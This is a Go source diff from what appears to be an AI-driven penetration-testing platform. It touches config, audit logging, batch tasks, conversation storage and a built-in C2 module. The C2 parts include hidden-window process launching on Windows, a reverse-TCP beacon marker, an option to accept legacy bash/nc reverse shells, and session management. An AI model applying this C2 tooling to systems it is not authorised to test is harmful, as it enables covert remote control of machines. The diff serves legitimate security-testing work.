cmd := exec.Command(tmpFile, cmdArgs...) cmd := exec.Command(tmpFile, cmdArgs...)
prepareHiddenCmd(cmd)
cwdMu.Lock() cwdMu.Lock()
cmd.Dir = currentCwd cmd.Dir = currentCwd
cwdMu.Unlock() cwdMu.Unlock()
@@ -0,0 +1,9 @@
//go:build !windows
package main
import "os/exec"
func prepareHiddenCmd(cmd *exec.Cmd) {
_ = cmd
}
@@ -0,0 +1,18 @@
//go:build windows
package main
import (
"os/exec"
"syscall"
)
// prepareHiddenCmd 避免子进程弹出控制台窗口(cmd / powershell / 临时 exe 等)。
func prepareHiddenCmd(cmd *exec.Cmd) {
if cmd == nil {
return
}
// 仅用 HideWindow:等价于 CREATE_NO_WINDOW,且 macOS/Linux 交叉编译 Windows 时
// syscall.CREATE_NO_WINDOW 常量不可用。
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
}
+3
View File
@@ -23,6 +23,9 @@ import (
// tcpBeaconMagic 二进制 Beacon 在反向 TCP 连接建立后首先发送的 4 字节,用于与经典 shell 反弹区分。 // tcpBeaconMagic 二进制 Beacon 在反向 TCP 连接建立后首先发送的 4 字节,用于与经典 shell 反弹区分。
const tcpBeaconMagic = "CSB1" const tcpBeaconMagic = "CSB1"
// tcpBeaconPeekTimeout 等待 CSB1 魔数的探测窗口;合法 Beacon 连接后立即发送魔数。
const tcpBeaconPeekTimeout = 2 * time.Second
// tcpBeaconMaxFrame 单帧密文(base64 字符串)最大字节数,防止 OOM。 // tcpBeaconMaxFrame 单帧密文(base64 字符串)最大字节数,防止 OOM。
const tcpBeaconMaxFrame = 64 << 20 const tcpBeaconMaxFrame = 64 << 20
+2
View File
@@ -141,6 +141,8 @@ type ListenerConfig struct {
MaxConcurrentTasks int `json:"max_concurrent_tasks,omitempty"` MaxConcurrentTasks int `json:"max_concurrent_tasks,omitempty"`
// CallbackHost 植入端/Payload 使用的回连主机名(可选);与 bind_host 分离,便于 NAT/ECS 等场景 // CallbackHost 植入端/Payload 使用的回连主机名(可选);与 bind_host 分离,便于 NAT/ECS 等场景
CallbackHost string `json:"callback_host,omitempty"` CallbackHost string `json:"callback_host,omitempty"`
// AllowLegacyShell 为 true 时 tcp_reverse 允许未加密的经典 bash/nc 反弹 shell 登记会话(默认 false,公网部署强烈不建议开启)
AllowLegacyShell bool `json:"allow_legacy_shell,omitempty"`
} }
// ApplyDefaults 对未填字段填默认值;调用方负责持久化时序列化新值 // ApplyDefaults 对未填字段填默认值;调用方负责持久化时序列化新值
+37 -8
View File
@@ -27,6 +27,7 @@ type Config struct {
Database DatabaseConfig `yaml:"database"` Database DatabaseConfig `yaml:"database"`
Auth AuthConfig `yaml:"auth"` Auth AuthConfig `yaml:"auth"`
Audit AuditConfig `yaml:"audit,omitempty" json:"audit,omitempty"` Audit AuditConfig `yaml:"audit,omitempty" json:"audit,omitempty"`
Monitor MonitorConfig `yaml:"monitor,omitempty" json:"monitor,omitempty"`
ExternalMCP ExternalMCPConfig `yaml:"external_mcp,omitempty"` ExternalMCP ExternalMCPConfig `yaml:"external_mcp,omitempty"`
Knowledge KnowledgeConfig `yaml:"knowledge,omitempty"` Knowledge KnowledgeConfig `yaml:"knowledge,omitempty"`
C2 C2Config `yaml:"c2,omitempty" json:"c2,omitempty"` // 内置 C2 总开关;未配置时默认启用 C2 C2Config `yaml:"c2,omitempty" json:"c2,omitempty"` // 内置 C2 总开关;未配置时默认启用
@@ -45,6 +46,7 @@ type ProjectConfig struct {
Enabled bool `yaml:"enabled" json:"enabled"` Enabled bool `yaml:"enabled" json:"enabled"`
DefaultProjectID string `yaml:"default_project_id,omitempty" json:"default_project_id,omitempty"` // 机器人/批量等无显式项目时绑定的默认项目 DefaultProjectID string `yaml:"default_project_id,omitempty" json:"default_project_id,omitempty"` // 机器人/批量等无显式项目时绑定的默认项目
FactIndexMaxRunes int `yaml:"fact_index_max_runes,omitempty" json:"fact_index_max_runes,omitempty"` FactIndexMaxRunes int `yaml:"fact_index_max_runes,omitempty" json:"fact_index_max_runes,omitempty"`
FactIndexPathMaxRunes int `yaml:"fact_index_path_max_runes,omitempty" json:"fact_index_path_max_runes,omitempty"`
FactSummaryMaxRunes int `yaml:"fact_summary_max_runes,omitempty" json:"fact_summary_max_runes,omitempty"` FactSummaryMaxRunes int `yaml:"fact_summary_max_runes,omitempty" json:"fact_summary_max_runes,omitempty"`
DefaultInjectDeprecated bool `yaml:"default_inject_deprecated,omitempty" json:"default_inject_deprecated,omitempty"` DefaultInjectDeprecated bool `yaml:"default_inject_deprecated,omitempty" json:"default_inject_deprecated,omitempty"`
} }
@@ -57,6 +59,14 @@ func (c ProjectConfig) FactIndexMaxRunesEffective() int {
return c.FactIndexMaxRunes return c.FactIndexMaxRunes
} }
// FactIndexPathMaxRunesEffective 攻击路径速览段的最大 rune 数(从 fact_index_max_runes 预算中预留)。
func (c ProjectConfig) FactIndexPathMaxRunesEffective() int {
if c.FactIndexPathMaxRunes <= 0 {
return 1000
}
return c.FactIndexPathMaxRunes
}
// FactSummaryMaxRunesEffective upsert 时 summary 最大 rune 数(索引一行,宜含验证要点)。 // FactSummaryMaxRunesEffective upsert 时 summary 最大 rune 数(索引一行,宜含验证要点)。
func (c ProjectConfig) FactSummaryMaxRunesEffective() int { func (c ProjectConfig) FactSummaryMaxRunesEffective() int {
if c.FactSummaryMaxRunes <= 0 { if c.FactSummaryMaxRunes <= 0 {
@@ -231,7 +241,7 @@ type MultiAgentEinoMiddlewareConfig struct {
PlantaskRelDir string `yaml:"plantask_rel_dir,omitempty" json:"plantask_rel_dir,omitempty"` PlantaskRelDir string `yaml:"plantask_rel_dir,omitempty" json:"plantask_rel_dir,omitempty"`
// Reduction truncates/offloads large tool outputs (requires eino local backend for Write). // Reduction truncates/offloads large tool outputs (requires eino local backend for Write).
ReductionEnable bool `yaml:"reduction_enable,omitempty" json:"reduction_enable,omitempty"` ReductionEnable bool `yaml:"reduction_enable,omitempty" json:"reduction_enable,omitempty"`
ReductionRootDir string `yaml:"reduction_root_dir,omitempty" json:"reduction_root_dir,omitempty"` // default: os temp + conversation id ReductionRootDir string `yaml:"reduction_root_dir,omitempty" json:"reduction_root_dir,omitempty"` // 非空:落盘根目录(默认 tmp/reduction);其下按 projects/{id} 或 conversations/{id} 隔离
ReductionMaxLengthForTrunc int `yaml:"reduction_max_length_for_trunc,omitempty" json:"reduction_max_length_for_trunc,omitempty"` // default 12000 ReductionMaxLengthForTrunc int `yaml:"reduction_max_length_for_trunc,omitempty" json:"reduction_max_length_for_trunc,omitempty"` // default 12000
ReductionMaxTokensForClear int `yaml:"reduction_max_tokens_for_clear,omitempty" json:"reduction_max_tokens_for_clear,omitempty"` // default 50000 ReductionMaxTokensForClear int `yaml:"reduction_max_tokens_for_clear,omitempty" json:"reduction_max_tokens_for_clear,omitempty"` // default 50000
ReductionClearExclude []string `yaml:"reduction_clear_exclude,omitempty" json:"reduction_clear_exclude,omitempty"` ReductionClearExclude []string `yaml:"reduction_clear_exclude,omitempty" json:"reduction_clear_exclude,omitempty"`
@@ -240,7 +250,7 @@ type MultiAgentEinoMiddlewareConfig struct {
SummarizationTriggerRatio float64 `yaml:"summarization_trigger_ratio,omitempty" json:"summarization_trigger_ratio,omitempty"` SummarizationTriggerRatio float64 `yaml:"summarization_trigger_ratio,omitempty" json:"summarization_trigger_ratio,omitempty"`
// SummarizationEmitInternalEvents controls middleware internal event emission (default true). // SummarizationEmitInternalEvents controls middleware internal event emission (default true).
SummarizationEmitInternalEvents *bool `yaml:"summarization_emit_internal_events,omitempty" json:"summarization_emit_internal_events,omitempty"` SummarizationEmitInternalEvents *bool `yaml:"summarization_emit_internal_events,omitempty" json:"summarization_emit_internal_events,omitempty"`
// SummarizationRetryMaxAttempts is extra retries after the first summarization Generate attempt; 0 = default 3. // SummarizationRetryMaxAttempts 已废弃:summarization 与 run loop 共用 run_retry_max_attempts 及 isEinoTransientRunError。
SummarizationRetryMaxAttempts int `yaml:"summarization_retry_max_attempts,omitempty" json:"summarization_retry_max_attempts,omitempty"` SummarizationRetryMaxAttempts int `yaml:"summarization_retry_max_attempts,omitempty" json:"summarization_retry_max_attempts,omitempty"`
// PlanExecuteUserInputBudgetRatio caps planner/replanner/executor userInput prompt budget ratio (default 0.35). // PlanExecuteUserInputBudgetRatio caps planner/replanner/executor userInput prompt budget ratio (default 0.35).
PlanExecuteUserInputBudgetRatio float64 `yaml:"plan_execute_user_input_budget_ratio,omitempty" json:"plan_execute_user_input_budget_ratio,omitempty"` PlanExecuteUserInputBudgetRatio float64 `yaml:"plan_execute_user_input_budget_ratio,omitempty" json:"plan_execute_user_input_budget_ratio,omitempty"`
@@ -254,9 +264,9 @@ type MultiAgentEinoMiddlewareConfig struct {
CheckpointDir string `yaml:"checkpoint_dir,omitempty" json:"checkpoint_dir,omitempty"` CheckpointDir string `yaml:"checkpoint_dir,omitempty" json:"checkpoint_dir,omitempty"`
// DeepOutputKey passed to deep.Config OutputKey (session final text); empty = off. // DeepOutputKey passed to deep.Config OutputKey (session final text); empty = off.
DeepOutputKey string `yaml:"deep_output_key,omitempty" json:"deep_output_key,omitempty"` DeepOutputKey string `yaml:"deep_output_key,omitempty" json:"deep_output_key,omitempty"`
// DeepModelRetryMaxRetries > 0 enables deep.Config ModelRetryConfig (framework-level chat model retries). // DeepModelRetryMaxRetries 已废弃:临时错误统一由 run loop 内 isEinoTransientRunError + run_retry_max_attempts 处理。
DeepModelRetryMaxRetries int `yaml:"deep_model_retry_max_retries,omitempty" json:"deep_model_retry_max_retries,omitempty"` DeepModelRetryMaxRetries int `yaml:"deep_model_retry_max_retries,omitempty" json:"deep_model_retry_max_retries,omitempty"`
// RunRetryMaxAttempts > 0429/5xx/网络抖动时 handler 分段续跑次数0=默认 10。 // RunRetryMaxAttempts > 0429/5xx/网络抖动时可退避重试次数(run loop 与 summarization 共用)0=默认 10。
RunRetryMaxAttempts int `yaml:"run_retry_max_attempts,omitempty" json:"run_retry_max_attempts,omitempty"` RunRetryMaxAttempts int `yaml:"run_retry_max_attempts,omitempty" json:"run_retry_max_attempts,omitempty"`
// RunRetryMaxBackoffSec 单次退避上限秒数;0=默认 30。 // RunRetryMaxBackoffSec 单次退避上限秒数;0=默认 30。
RunRetryMaxBackoffSec int `yaml:"run_retry_max_backoff_sec,omitempty" json:"run_retry_max_backoff_sec,omitempty"` RunRetryMaxBackoffSec int `yaml:"run_retry_max_backoff_sec,omitempty" json:"run_retry_max_backoff_sec,omitempty"`
@@ -593,10 +603,8 @@ type DatabaseConfig struct {
} }
type AgentConfig struct { type AgentConfig struct {
MaxIterations int `yaml:"max_iterations" json:"max_iterations"` MaxIterations int `yaml:"max_iterations" json:"max_iterations"`
LargeResultThreshold int `yaml:"large_result_threshold" json:"large_result_threshold"` // 大结果阈值(字节),默认50KB ToolTimeoutMinutes int `yaml:"tool_timeout_minutes" json:"tool_timeout_minutes"` // 单次工具执行最大时长(分钟),超时自动终止,防止长时间挂起;0 表示不限制(不推荐)
ResultStorageDir string `yaml:"result_storage_dir" json:"result_storage_dir"` // 结果存储目录,默认tmp
ToolTimeoutMinutes int `yaml:"tool_timeout_minutes" json:"tool_timeout_minutes"` // 单次工具执行最大时长(分钟),超时自动终止,防止长时间挂起;0 表示不限制(不推荐)
// SystemPromptPath 单代理系统提示 Markdown/文本文件路径(相对 config.yaml 所在目录,或可写绝对路径)。非空且可读时替换内置单代理提示;留空用内置。 // SystemPromptPath 单代理系统提示 Markdown/文本文件路径(相对 config.yaml 所在目录,或可写绝对路径)。非空且可读时替换内置单代理提示;留空用内置。
SystemPromptPath string `yaml:"system_prompt_path,omitempty" json:"system_prompt_path,omitempty"` SystemPromptPath string `yaml:"system_prompt_path,omitempty" json:"system_prompt_path,omitempty"`
} }
@@ -616,6 +624,23 @@ type AuthConfig struct {
GeneratedPasswordPersistErr string `yaml:"-" json:"-"` GeneratedPasswordPersistErr string `yaml:"-" json:"-"`
} }
// MonitorConfig MCP 状态监控(tool_executions)保留策略。
type MonitorConfig struct {
// RetentionDays 执行记录保留天数;省略时默认 90;0 表示不自动清理。
RetentionDays *int `yaml:"retention_days,omitempty" json:"retention_days,omitempty"`
}
// RetentionDaysEffective returns retention; 0 means keep forever; omitted defaults to 90.
func (m MonitorConfig) RetentionDaysEffective() int {
if m.RetentionDays == nil {
return 90
}
if *m.RetentionDays < 0 {
return 0
}
return *m.RetentionDays
}
// AuditConfig platform operation audit log settings (not chat/tool execution bodies). // AuditConfig platform operation audit log settings (not chat/tool execution bodies).
type AuditConfig struct { type AuditConfig struct {
// Enabled nil or true enables persistence; explicit false disables. // Enabled nil or true enables persistence; explicit false disables.
@@ -1267,6 +1292,10 @@ func Default() *Config {
Enabled: &on, Enabled: &on,
} }
}(), }(),
Monitor: func() MonitorConfig {
days := 90
return MonitorConfig{RetentionDays: &days}
}(),
Robots: RobotsConfig{ Robots: RobotsConfig{
Session: RobotSessionConfig{ Session: RobotSessionConfig{
StrictUserIdentity: &strictRobotIdentity, StrictUserIdentity: &strictRobotIdentity,
+9 -7
View File
@@ -69,12 +69,12 @@ func buildAuditLogsWhere(filter ListAuditLogsFilter) (string, []interface{}) {
args = append(args, filter.ResourceID) args = append(args, filter.ResourceID)
} }
if filter.Since != nil { if filter.Since != nil {
conditions = append(conditions, "created_at >= ?") conditions = append(conditions, sqliteEpochGE("created_at", ">="))
args = append(args, *filter.Since) args = append(args, formatSQLiteUTC(*filter.Since))
} }
if filter.Until != nil { if filter.Until != nil {
conditions = append(conditions, "created_at <= ?") conditions = append(conditions, sqliteEpochGE("created_at", "<="))
args = append(args, *filter.Until) args = append(args, formatSQLiteUTC(*filter.Until))
} }
if q := strings.TrimSpace(filter.Query); q != "" { if q := strings.TrimSpace(filter.Query); q != "" {
like := "%" + q + "%" like := "%" + q + "%"
@@ -93,7 +93,9 @@ func (db *DB) AppendAuditLog(row *AuditLog) error {
return errors.New("audit id is required") return errors.New("audit id is required")
} }
if row.CreatedAt.IsZero() { if row.CreatedAt.IsZero() {
row.CreatedAt = time.Now() row.CreatedAt = time.Now().UTC()
} else {
row.CreatedAt = row.CreatedAt.UTC()
} }
if strings.TrimSpace(row.Level) == "" { if strings.TrimSpace(row.Level) == "" {
row.Level = "info" row.Level = "info"
@@ -111,7 +113,7 @@ func (db *DB) AppendAuditLog(row *AuditLog) error {
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
` `
_, err := db.Exec(query, _, err := db.Exec(query,
row.ID, row.CreatedAt, row.Level, row.Category, row.Action, row.Result, row.ID, formatSQLiteUTC(row.CreatedAt), row.Level, row.Category, row.Action, row.Result,
row.Actor, row.SessionHint, row.ClientIP, row.UserAgent, row.Actor, row.SessionHint, row.ClientIP, row.UserAgent,
row.ResourceType, row.ResourceID, row.Message, detailJSON, row.ResourceType, row.ResourceID, row.Message, detailJSON,
) )
@@ -202,7 +204,7 @@ func (db *DB) ListAuditLogs(filter ListAuditLogsFilter) ([]*AuditLog, error) {
// DeleteAuditLogsBefore removes rows older than cutoff. // DeleteAuditLogsBefore removes rows older than cutoff.
func (db *DB) DeleteAuditLogsBefore(cutoff time.Time) (int64, error) { func (db *DB) DeleteAuditLogsBefore(cutoff time.Time) (int64, error) {
res, err := db.Exec(`DELETE FROM audit_logs WHERE created_at < ?`, cutoff) res, err := db.Exec(`DELETE FROM audit_logs WHERE `+sqliteEpochGE("created_at", "<"), formatSQLiteUTC(cutoff))
if err != nil { if err != nil {
return 0, err return 0, err
} }
+62
View File
@@ -0,0 +1,62 @@
package database
import (
"os"
"path/filepath"
"strings"
"testing"
"time"
"go.uber.org/zap"
)
func TestBuildAuditLogsWhere_timeFilterSQL(t *testing.T) {
since := time.Date(2026, 6, 16, 17, 2, 0, 0, time.UTC)
until := time.Date(2026, 6, 17, 3, 3, 0, 0, time.UTC)
where, args := buildAuditLogsWhere(ListAuditLogsFilter{Since: &since, Until: &until})
if !strings.Contains(where, "strftime('%s', created_at) >=") {
t.Fatalf("expected epoch comparison for since, got %q", where)
}
if !strings.Contains(where, "strftime('%s', created_at) <=") {
t.Fatalf("expected epoch comparison for until, got %q", where)
}
if len(args) != 2 {
t.Fatalf("expected 2 time args, got %d", len(args))
}
for i, arg := range args {
s, ok := arg.(string)
if !ok || s == "" {
t.Fatalf("arg %d: want non-empty UTC RFC3339 string, got %v", i, arg)
}
}
}
func TestListAuditLogs_timeFilterMixedStorageFormats(t *testing.T) {
root, err := os.Getwd()
if err != nil {
t.Skip(err)
}
dbPath := filepath.Join(root, "..", "..", "data", "conversations.db")
if _, err := os.Stat(dbPath); err != nil {
t.Skip("conversations.db not found")
}
db, err := NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatal(err)
}
defer db.Close()
since, _ := ParseRFC3339Time("2026-06-16T17:02:00Z")
until, _ := ParseRFC3339Time("2026-06-17T03:03:00Z")
filter := ListAuditLogsFilter{Since: &since, Until: &until, Limit: 50}
logs, err := db.ListAuditLogs(filter)
if err != nil {
t.Fatal(err)
}
for _, row := range logs {
at := row.CreatedAt.UTC()
if at.Before(since) || at.After(until) {
t.Fatalf("log %s at %s outside [%s, %s]", row.ID, at, since, until)
}
}
}
+37 -1
View File
@@ -239,7 +239,7 @@ func (db *DB) CountBatchQueues(status, keyword string) (int, error) {
// GetBatchTasks 获取批量任务队列的所有任务 // GetBatchTasks 获取批量任务队列的所有任务
func (db *DB) GetBatchTasks(queueID string) ([]*BatchTaskRow, error) { func (db *DB) GetBatchTasks(queueID string) ([]*BatchTaskRow, error) {
rows, err := db.Query( rows, err := db.Query(
"SELECT id, queue_id, message, conversation_id, status, started_at, completed_at, error, result FROM batch_tasks WHERE queue_id = ? ORDER BY id", "SELECT id, queue_id, message, conversation_id, status, started_at, completed_at, error, result FROM batch_tasks WHERE queue_id = ? ORDER BY rowid ASC",
queueID, queueID,
) )
if err != nil { if err != nil {
@@ -507,6 +507,42 @@ func (db *DB) CancelPendingBatchTasks(queueID string, completedAt time.Time) err
return nil return nil
} }
// PrepareBatchSingleTaskRun 准备单条执行:可选重置子任务,并更新队列索引与状态
func (db *DB) PrepareBatchSingleTaskRun(queueID, taskID string, taskIndex int, resetTask, resumeQueue bool) error {
tx, err := db.Begin()
if err != nil {
return fmt.Errorf("开始事务失败: %w", err)
}
defer tx.Rollback()
if resetTask {
_, err = tx.Exec(
"UPDATE batch_tasks SET status = ?, conversation_id = NULL, started_at = NULL, completed_at = NULL, error = NULL, result = NULL WHERE queue_id = ? AND id = ?",
"pending", queueID, taskID,
)
if err != nil {
return fmt.Errorf("重置批量任务状态失败: %w", err)
}
}
if resumeQueue {
_, err = tx.Exec(
"UPDATE batch_task_queues SET status = ?, current_index = ?, completed_at = NULL, last_run_error = NULL WHERE id = ?",
"paused", taskIndex, queueID,
)
} else {
_, err = tx.Exec(
"UPDATE batch_task_queues SET current_index = ?, last_run_error = NULL WHERE id = ?",
taskIndex, queueID,
)
}
if err != nil {
return fmt.Errorf("更新批量任务队列状态失败: %w", err)
}
return tx.Commit()
}
// DeleteBatchTask 删除批量任务 // DeleteBatchTask 删除批量任务
func (db *DB) DeleteBatchTask(queueID, taskID string) error { func (db *DB) DeleteBatchTask(queueID, taskID string) error {
_, err := db.Exec( _, err := db.Exec(
+47
View File
@@ -17,6 +17,9 @@ var ErrNoValidC2EventIDs = errors.New("no valid event ids")
// ErrNoValidC2TaskIDs 批量删除任务时未提供任何合法 ID // ErrNoValidC2TaskIDs 批量删除任务时未提供任何合法 ID
var ErrNoValidC2TaskIDs = errors.New("no valid task ids") var ErrNoValidC2TaskIDs = errors.New("no valid task ids")
// ErrNoValidC2SessionIDs 批量删除会话时未提供任何合法 ID
var ErrNoValidC2SessionIDs = errors.New("no valid session ids")
// validC2TextIDForDelete 校验 C2 文本主键(e_/t_/s_/… 等)用于批量删除入参 // validC2TextIDForDelete 校验 C2 文本主键(e_/t_/s_/… 等)用于批量删除入参
func validC2TextIDForDelete(id string) bool { func validC2TextIDForDelete(id string) bool {
if len(id) < 2 || len(id) > 80 { if len(id) < 2 || len(id) > 80 {
@@ -473,6 +476,7 @@ type ListC2SessionsFilter struct {
Status string // active|sleeping|dead|killed;空表示全部 Status string // active|sleeping|dead|killed;空表示全部
OS string OS string
Search string // 模糊匹配 hostname/username/internal_ip Search string // 模糊匹配 hostname/username/internal_ip
Suspicious bool // 疑似误报:离线且 hostname 为 tcp_* / 用户名为 unknown / PID 为 0
Limit int // 0 表示无限制 Limit int // 0 表示无限制
} }
@@ -497,6 +501,11 @@ func (db *DB) ListC2Sessions(filter ListC2SessionsFilter) ([]*C2Session, error)
kw := "%" + filter.Search + "%" kw := "%" + filter.Search + "%"
args = append(args, kw, kw, kw) args = append(args, kw, kw, kw)
} }
if filter.Suspicious {
conditions = append(conditions, `status = 'dead' AND (
hostname LIKE 'tcp_%' OR LOWER(COALESCE(username,'')) = 'unknown' OR COALESCE(pid, 0) = 0
)`)
}
query := ` query := `
SELECT id, listener_id, implant_uuid, COALESCE(hostname,''), COALESCE(username,''), SELECT id, listener_id, implant_uuid, COALESCE(hostname,''), COALESCE(username,''),
COALESCE(os,''), COALESCE(arch,''), COALESCE(pid, 0), COALESCE(process_name,''), COALESCE(os,''), COALESCE(arch,''), COALESCE(pid, 0), COALESCE(process_name,''),
@@ -554,6 +563,44 @@ func (db *DB) DeleteC2Session(id string) error {
return nil return nil
} }
// DeleteC2SessionsByIDs 按主键批量删除会话
func (db *DB) DeleteC2SessionsByIDs(ids []string) (int64, error) {
if len(ids) == 0 {
return 0, nil
}
const maxBatch = 500
if len(ids) > maxBatch {
ids = ids[:maxBatch]
}
clean := make([]string, 0, len(ids))
seen := make(map[string]struct{}, len(ids))
for _, id := range ids {
id = strings.TrimSpace(id)
if !validC2TextIDForDelete(id) {
continue
}
if _, ok := seen[id]; ok {
continue
}
seen[id] = struct{}{}
clean = append(clean, id)
}
if len(clean) == 0 {
return 0, ErrNoValidC2SessionIDs
}
placeholders := strings.Repeat("?,", len(clean)-1) + "?"
args := make([]interface{}, len(clean))
for i := range clean {
args[i] = clean[i]
}
query := `DELETE FROM c2_sessions WHERE id IN (` + placeholders + `)`
res, err := db.Exec(query, args...)
if err != nil {
return 0, err
}
return res.RowsAffected()
}
// ---------------------------------------------------------------------------- // ----------------------------------------------------------------------------
// CRUDC2 任务 // CRUDC2 任务
// ---------------------------------------------------------------------------- // ----------------------------------------------------------------------------
+259 -19
View File
@@ -352,8 +352,8 @@ func (db *DB) GetConversationLite(id string) (*Conversation, error) {
conv.Pinned = pinned != 0 conv.Pinned = pinned != 0
// 加载消息(不加载 process_details // 加载消息(不加载 process_details / reasoning_content,减少历史会话切换 payload
messages, err := db.GetMessages(id) messages, err := db.GetMessagesLite(id)
if err != nil { if err != nil {
return nil, fmt.Errorf("加载消息失败: %w", err) return nil, fmt.Errorf("加载消息失败: %w", err)
} }
@@ -382,26 +382,40 @@ func (db *DB) CountConversations(search string) (int, error) {
return count, nil return count, nil
} }
func conversationOrderClause(sortBy, tableAlias string) string {
col := "updated_at"
if strings.TrimSpace(strings.ToLower(sortBy)) == "created_at" {
col = "created_at"
}
prefix := tableAlias
if prefix != "" {
prefix += "."
}
return "ORDER BY " + prefix + col + " DESC"
}
// ListConversations 列出所有对话 // ListConversations 列出所有对话
func (db *DB) ListConversations(limit, offset int, search string) ([]*Conversation, error) { func (db *DB) ListConversations(limit, offset int, search, sortBy string) ([]*Conversation, error) {
var rows *sql.Rows var rows *sql.Rows
var err error var err error
if search != "" { if search != "" {
// 使用 EXISTS 子查询代替 LEFT JOIN + DISTINCT,避免大表笛卡尔积 // 使用 EXISTS 子查询代替 LEFT JOIN + DISTINCT,避免大表笛卡尔积
searchPattern := "%" + search + "%" searchPattern := "%" + search + "%"
orderClause := conversationOrderClause(sortBy, "c")
rows, err = db.Query( rows, err = db.Query(
`SELECT c.id, c.title, COALESCE(c.pinned, 0), c.created_at, c.updated_at, c.project_id `SELECT c.id, c.title, COALESCE(c.pinned, 0), c.created_at, c.updated_at, c.project_id
FROM conversations c FROM conversations c
WHERE c.title LIKE ? WHERE c.title LIKE ?
OR EXISTS (SELECT 1 FROM messages m WHERE m.conversation_id = c.id AND m.content LIKE ?) OR EXISTS (SELECT 1 FROM messages m WHERE m.conversation_id = c.id AND m.content LIKE ?)
ORDER BY c.updated_at DESC `+orderClause+`
LIMIT ? OFFSET ?`, LIMIT ? OFFSET ?`,
searchPattern, searchPattern, limit, offset, searchPattern, searchPattern, limit, offset,
) )
} else { } else {
orderClause := conversationOrderClause(sortBy, "")
rows, err = db.Query( rows, err = db.Query(
"SELECT id, title, COALESCE(pinned, 0), created_at, updated_at, project_id FROM conversations ORDER BY updated_at DESC LIMIT ? OFFSET ?", "SELECT id, title, COALESCE(pinned, 0), created_at, updated_at, project_id FROM conversations "+orderClause+" LIMIT ? OFFSET ?",
limit, offset, limit, offset,
) )
} }
@@ -467,11 +481,12 @@ func (db *DB) CountUngroupedConversations() (int, error) {
} }
// ListUngroupedConversations 列出不在任何分组中的对话(最近对话侧栏)。 // ListUngroupedConversations 列出不在任何分组中的对话(最近对话侧栏)。
func (db *DB) ListUngroupedConversations(limit, offset int) ([]*Conversation, error) { func (db *DB) ListUngroupedConversations(limit, offset int, sortBy string) ([]*Conversation, error) {
orderClause := conversationOrderClause(sortBy, "c")
rows, err := db.Query( rows, err := db.Query(
`SELECT c.id, c.title, COALESCE(c.pinned, 0), c.created_at, c.updated_at, c.project_id `+ `SELECT c.id, c.title, COALESCE(c.pinned, 0), c.created_at, c.updated_at, c.project_id `+
ungroupedConversationsSQL+` ungroupedConversationsSQL+`
ORDER BY c.updated_at DESC `+orderClause+`
LIMIT ? OFFSET ?`, LIMIT ? OFFSET ?`,
limit, offset, limit, offset,
) )
@@ -543,39 +558,107 @@ func (db *DB) UpdateConversationTime(id string) error {
return nil return nil
} }
// DeleteConversation 删除对话及其所有相关数据 // DeleteConversation 删除对话及其会话相关数据
// 由于数据库外键约束设置了 ON DELETE CASCADE,删除对话时会自动删除: // 由于数据库外键约束设置了 ON DELETE CASCADE,删除对话时会自动删除:
// - messages(消息) // - messages(消息)
// - process_details(过程详情) // - process_details(过程详情)
// - attack_chain_nodes(攻击链节点) // - attack_chain_nodes(攻击链节点)
// - attack_chain_edges(攻击链边) // - attack_chain_edges(攻击链边)
// - vulnerabilities(漏洞)
// - conversation_group_mappings(分组映射) // - conversation_group_mappings(分组映射)
// 注意:knowledge_retrieval_logs 使用 ON DELETE SET NULL,记录会保留但 conversation_id 会被设为 NULL // 漏洞记录会保留:vulnerabilities.conversation_id 使用 ON DELETE SET NULL,仅解除与会话的关联。
// 注意:knowledge_retrieval_logs 在删除前会被显式清理。
func (db *DB) DeleteConversation(id string) error { func (db *DB) DeleteConversation(id string) error {
// 删除对话前补全漏洞来源标签,便于在漏洞库中追溯已删除会话的发现。
_, err := db.Exec(`
UPDATE vulnerabilities
SET conversation_tag = COALESCE(NULLIF(TRIM(conversation_tag), ''), (SELECT title FROM conversations WHERE id = ?))
WHERE conversation_id = ?
`, id, id)
if err != nil {
db.logger.Warn("更新漏洞来源标签失败", zap.String("conversationId", id), zap.Error(err))
}
// 显式删除知识检索日志(虽然外键是SET NULL,但为了彻底清理,我们手动删除) // 显式删除知识检索日志(虽然外键是SET NULL,但为了彻底清理,我们手动删除)
_, err := db.Exec("DELETE FROM knowledge_retrieval_logs WHERE conversation_id = ?", id) _, err = db.Exec("DELETE FROM knowledge_retrieval_logs WHERE conversation_id = ?", id)
if err != nil { if err != nil {
db.logger.Warn("删除知识检索日志失败", zap.String("conversationId", id), zap.Error(err)) db.logger.Warn("删除知识检索日志失败", zap.String("conversationId", id), zap.Error(err))
// 不返回错误,继续删除对话 // 不返回错误,继续删除对话
} }
projectID, _ := db.GetConversationProjectID(id)
// 删除对话(外键CASCADE会自动删除其他相关数据) // 删除对话(外键CASCADE会自动删除其他相关数据)
_, err = db.Exec("DELETE FROM conversations WHERE id = ?", id) _, err = db.Exec("DELETE FROM conversations WHERE id = ?", id)
if err != nil { if err != nil {
return fmt.Errorf("删除对话失败: %w", err) return fmt.Errorf("删除对话失败: %w", err)
} }
// Best-effort cleanup for conversation-scoped filesystem artifacts db.removeConversationScopedDirs(id, projectID)
// (e.g., summarization transcript, reduction/checkpoint files under conversation_artifacts/<id>).
if base := strings.TrimSpace(db.conversationArtifactsDir); base != "" { db.logger.Info("对话已删除(漏洞记录已保留)", zap.String("conversationId", id))
artDir := filepath.Join(base, id) return nil
if rmErr := os.RemoveAll(artDir); rmErr != nil { }
db.logger.Warn("删除会话 artifacts 目录失败", zap.String("conversationId", id), zap.String("dir", artDir), zap.Error(rmErr))
func sanitizeConversationPathSegment(s string) string {
s = strings.TrimSpace(s)
if s == "" {
return "default"
}
s = strings.ReplaceAll(s, string(filepath.Separator), "-")
s = strings.ReplaceAll(s, "/", "-")
s = strings.ReplaceAll(s, "\\", "-")
s = strings.ReplaceAll(s, "..", "__")
if len(s) > 180 {
s = s[:180]
}
return s
}
func (db *DB) removeConversationScopedDir(base, conversationID, label string) {
base = strings.TrimSpace(base)
if base == "" {
return
}
dir := filepath.Join(base, sanitizeConversationPathSegment(conversationID))
if rmErr := os.RemoveAll(dir); rmErr != nil {
if db.logger != nil {
db.logger.Warn("删除会话目录失败",
zap.String("conversationId", conversationID),
zap.String("kind", label),
zap.String("dir", dir),
zap.Error(rmErr))
} }
} }
}
db.logger.Info("对话及其所有相关数据已删除", zap.String("conversationId", id)) func (db *DB) einoReductionBaseDir() string {
return nil if db == nil {
return ""
}
